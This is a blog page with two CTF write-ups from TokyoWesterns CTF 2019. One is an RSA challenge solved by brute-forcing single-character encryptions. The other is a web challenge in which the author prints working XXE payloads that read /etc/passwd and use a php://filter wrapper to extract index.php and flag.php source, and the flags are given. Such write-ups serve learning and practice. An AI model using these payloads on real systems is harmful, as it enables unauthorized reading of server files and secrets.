real-baby-rsa TokyoWesterns CTF 5th 2019

on   in , ,   with Không có nhận xét nào
Hi everyone, this is the next post in the series of writeup of the TokyoWesterns CTF 5th 2019 contest, and it is  a cryptographic challenge : real-baby-rsa

Link: real-baby-rsa

Initially, because this was the first time our team participated in this competition, we thought it would be difficult to complete a challenge, but surprisingly, the organizers gave the challenge from easy to hard. and that makes us appreciate, let's start!

Look at the problem.py:


We can easily understand the flow of coding here: People create each part of the ciphertext(output.txt) by encoding each character of the flag with RSA with N, e already known.

Therefore, the solution to this problem is simply brute force, for each part of the cirpher text, we will try to encode with RSA each character in ascii charset, repeat this step for all parts of the cirpher text.

Here is my script python for the solution: my solution





Flag: TWCTF{padding_is_important}

 Thanks for watching :)
Share:

j2x2j TokyoWesterns CTF 5th 2019

on   in , ,   with 1 nhận xét
Recently, our team wanted to improve CTFtime's rankings so they worked harder, and this time it was TokyoWesterns CTF, the following is the write up of j2x2j web challenge!

    Link: http://j2x2j.chal.ctf.westerns.tokyo/


At the gance, I saw this word : "JSON <-> XML Converter" in the title. Obviously, I would immediately think of XXE.

Back to the site's interface, there are 2 boxes, a json format box, and an xml format box. By using the following payload, we can determine if it is really a XXE vulnerability or not.

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>

Put this payload and boom!


Later, I found that the site was written by PHP, and in may poison repository, there were weapons available to solve this problem :) I used PHP wrapper inside XXE

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
  <contact>
    <name>lnlinh31 &xxe; </name>
  </contact>
</contacts>





Looking at the first line of index.php, you know what to do?

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flag.php"> ]>
<contacts>
  <contact>
    <name>lnlinh31 &xxe; </name>
  </contact>
</contacts>


Flag: TWCTF{t1ny_XXE_st1ll_ex1sts_everywhere}
Hope this article makes you satisfied, thanks for watching :)
Share: